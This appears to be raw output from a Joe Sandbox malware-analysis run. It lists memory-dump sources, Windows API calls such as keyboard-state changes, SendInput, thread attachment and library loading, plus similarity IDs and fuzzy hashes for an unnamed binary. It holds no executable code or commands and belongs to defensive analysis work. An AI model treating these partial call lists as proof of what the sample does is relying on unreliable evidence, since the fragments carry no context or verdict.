• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
• Opcode ID: ba47fa5fd97fc0d85fe972016df731a2b61c7c53bd854fcd5819234c383c609b
• Instruction ID: fbc3c033269925b3426396b8a52d92765c6ded282e01f43628332082584aaf00
• Opcode Fuzzy Hash: ba47fa5fd97fc0d85fe972016df731a2b61c7c53bd854fcd5819234c383c609b
• Instruction Fuzzy Hash: F441D474A00200AFE720AF24DC86F6A77E5EF44758F54C448F9598F2D2D776ED42AB90
APIs
• GetWindowRect.USER32(?,?), ref: 00F96D1A
• ScreenToClient.USER32(?,?), ref: 00F96D4D
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00F96DBA
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: e1081d68c7adfeb03e96d21d5a869a822fc483dd26e08212f3ae97c0ac1d92c1
• Instruction ID: e88ea2e39ede3c6a05d53bb1f80c6da3b78827cc2943ff47f59e9b67d0ba06ec
• Opcode Fuzzy Hash: e1081d68c7adfeb03e96d21d5a869a822fc483dd26e08212f3ae97c0ac1d92c1
• Instruction Fuzzy Hash: 98512F75A00209EFDF24DF64D8809AE7BB6FF54364F20815AF925D7290D730AD41EB90
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F761C8
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00F761EE
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F76213
                                                                                                                                                                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F7623F
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00F6B473
                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(00000080), ref: 00F6B48F
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00F6B4FD
                                                                                                                                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00F6B54F
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00F6B5B8
                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F6B5D4
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F6B63B
                                                                                                                                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00F6B68D
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00F980D4
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F9814A
                                                                                                                                                                                                                                                                                        • PtInRect.USER32(?,?,?), ref: 00F9815A
                                                                                                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00F981C6
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 10e5b5fa97076a1c0a34905179fb85983e6268c4828837491fdc3bc57c78bd38
                                                                                                                                                                                                                                                                                        • Instruction ID: 58ff847ea088ed610c5dc41ca20df08ca5a5908f3236bb094f2daf606a58a1f2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10e5b5fa97076a1c0a34905179fb85983e6268c4828837491fdc3bc57c78bd38
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE41A431A01219DFEF15CF58D884A6977F5FF46364F2440A5EA54DB261CB31E883EB90
APIs
• GetForegroundWindow.USER32 ref: 00F92187
  • Part of subcall function 00F64393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F643AD
  • Part of subcall function 00F64393: GetCurrentThreadId.KERNEL32 ref: 00F643B4
  • Part of subcall function 00F64393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F62F00), ref: 00F643BB
• GetCaretPos.USER32(?), ref: 00F9219B
• ClientToScreen.USER32(00000000,?), ref: 00F921E8
• GetForegroundWindow.USER32 ref: 00F921EE
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: a566175fd884c91908af61187fab7420accd57a7c26e52bba5568a4a61a12f45
• Instruction ID: b4fe7fb5e5be832ff515c5e73981779ae549641cc0d6d492e76e050f3a49d5d8
• Opcode Fuzzy Hash: a566175fd884c91908af61187fab7420accd57a7c26e52bba5568a4a61a12f45
• Instruction Fuzzy Hash: 2C316671E00209AFDB04EFA9CC81CAEB7FCEF48304B54846AE415E7251D7759E45EBA0
APIs
  • Part of subcall function 00F041EA: _wcslen.LIBCMT ref: 00F041EF
• _wcslen.LIBCMT ref: 00F6E8E2
• _wcslen.LIBCMT ref: 00F6E8F9
• _wcslen.LIBCMT ref: 00F6E924
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00F6E92F
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: _wcslen$ExtentPoint32Text
• String ID:
• API String ID: 3763101759-0
• Opcode ID: 5c5d96a29dc925784ff22e4f32712d819c97d9242125a84d7aef5312567e36fa
• Instruction ID: 5dc9bb3745393ad126b9d760becbb15887569ce0d221e4076116e9b68225ea43
• Opcode Fuzzy Hash: 5c5d96a29dc925784ff22e4f32712d819c97d9242125a84d7aef5312567e36fa
• Instruction Fuzzy Hash: 1421C976D00224EFDB10AFA8DD81BAEB7F8EF55360F144065F904BB281D6749E41EBA1
APIs
  • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
• GetCursorPos.USER32(?), ref: 00F99A5D
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F99A72
• GetCursorPos.USER32(?), ref: 00F99ABA
• DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00F99AF0
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
• Opcode ID: f0666cd2dd52f8a3c9f5c55e471dbb503d0f1baba315b788bd63658ef9525c59
• Instruction ID: 90df11467ed12b424f7cd38044f271525bfe34e8feaa7ec3aea34334b326e907
• Opcode Fuzzy Hash: f0666cd2dd52f8a3c9f5c55e471dbb503d0f1baba315b788bd63658ef9525c59
• Instruction Fuzzy Hash: D521D335900018EFDF158F58C858EFA7BB5EB09360F55405AF905471A1D3799950FB60
APIs
• GetFileAttributesW.KERNEL32(?,00F9DC30), ref: 00F6DBA6
• GetLastError.KERNEL32 ref: 00F6DBB5
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00F6DBC4
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F9DC30), ref: 00F6DC21
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
• Opcode ID: 8fef634db07dd5c68aba0211fd5a61a5f6d946c10796f86ca8fc5e58f0c4d587
                                                                                                                                                                                                                                                                                        • Instruction ID: 7f909b35c46955998db88d10bf5960f0fbb526fde22d2f26e7a3619d6c62c321
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fef634db07dd5c68aba0211fd5a61a5f6d946c10796f86ca8fc5e58f0c4d587
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2121A331A043099FC704DF28C98096BB7E8EE96764F200A19F499C32E1DB70D946FB52
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00F932A6
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F932C0
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F932CE
                                                                                                                                                                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F932DC
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cce6e810a113b524bc2562f03c5e352cdcaca4a6c3ff4b12dd6cc13bbd68cf28
                                                                                                                                                                                                                                                                                        • Instruction ID: 1c8c66f4217310ff28d59e62e9f5634e3a968213c9a1088a07f75ea59e48a7c4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cce6e810a113b524bc2562f03c5e352cdcaca4a6c3ff4b12dd6cc13bbd68cf28
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8321D331605111AFEB149B24CC45F6ABBA5EF85324F24825DF8268B2D2C776ED41DBD0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F696E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00F68271,?,000000FF,?,00F690BB,00000000,?,0000001C,?,?), ref: 00F696F3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F696E4: lstrcpyW.KERNEL32(00000000,?,?,00F68271,?,000000FF,?,00F690BB,00000000,?,0000001C,?,?,00000000), ref: 00F69719
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F696E4: lstrcmpiW.KERNEL32(00000000,?,00F68271,?,000000FF,?,00F690BB,00000000,?,0000001C,?,?), ref: 00F6974A
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00F690BB,00000000,?,0000001C,?,?,00000000), ref: 00F6828A
                                                                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00F690BB,00000000,?,0000001C,?,?,00000000), ref: 00F682B0
                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F690BB,00000000,?,0000001C,?,?,00000000), ref: 00F682EB
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                        • String ID: cdecl
                                                                                                                                                                                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                        • Opcode ID: c1c0b8d49e6f2bc8e14cdcb171bf0c832eecec34daf445eb9cb95768ecd3b180
                                                                                                                                                                                                                                                                                        • Instruction ID: dc9f061d9814d362291ccc63b453fdefb60c026d171234bb39abda6f90f9474f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1c0b8d49e6f2bc8e14cdcb171bf0c832eecec34daf445eb9cb95768ecd3b180
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E211263A200342ABCB149F38DC45E7A77A9FF487A0B10412EF942C7260EF759812E791
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 00F9615A
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F9616C
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F96177
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F962B5
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a88d3401cda1630aac809df1de00757865274a5a03f4281a2641b9b3e49b547c
                                                                                                                                                                                                                                                                                        • Instruction ID: 4c2552f6fb9d8907103924ec4470b5b0125f3738b5778c19cac25cacfcf31900
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a88d3401cda1630aac809df1de00757865274a5a03f4281a2641b9b3e49b547c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D11D636A00218A6EF11DFA59C84EEF777CEB157A4F104127F911D5181E7B4C984FB61
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F62394
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F623A6
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F623BC
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F623D7
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00F01AF4
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00F431F9
                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00F43203
                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00F4320E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F6EB14
                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00F6EB47
                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F6EB5D
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F6EB64
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,?,00F2D369,00000000,00000004,00000000), ref: 00F2D588
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F2D594
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00F2D59B
                                                                                                                                                                                                                                                                                        • ResumeThread.KERNEL32(00000000), ref: 00F2D5B9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F078B1
                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00F078C5
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F078CF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 80b52689e64ba2a5b1c4273e3923943798475904856829afba6638847ca4fa27
                                                                                                                                                                                                                                                                                        • Instruction ID: 29faad0ea7dee40ffc9409c9887d6c19843627aff4f417f9a01089b6130a48fa
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80b52689e64ba2a5b1c4273e3923943798475904856829afba6638847ca4fa27
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F118E7290524CBFDF026F908C58EEABBAAFF08364F244116FA0052150D731AC60FBA1
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00F3338D,00000364,00000000,00000000,00000000,?,00F335FE,00000006,FlsSetValue), ref: 00F33418
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00F3338D,00000364,00000000,00000000,00000000,?,00F335FE,00000006,FlsSetValue,00FA3260,FlsSetValue,00000000,00000364,?,00F331B9), ref: 00F33424
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F3338D,00000364,00000000,00000000,00000000,?,00F335FE,00000006,FlsSetValue,00FA3260,FlsSetValue,00000000), ref: 00F33432
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a2ce1b42ab5a35bb033972039c94630f5c8c22a05e06c85f943c639add59e3fa
                                                                                                                                                                                                                                                                                        • Instruction ID: 9e81ba932868ca98da7efff9a68152439dcc8e78cb97a348ac009692b13093af
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2ce1b42ab5a35bb033972039c94630f5c8c22a05e06c85f943c639add59e3fa
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC01A733B11226ABDB22CB79DD44A567B58BF05B71B214621F906D7180D730DE01E6E0
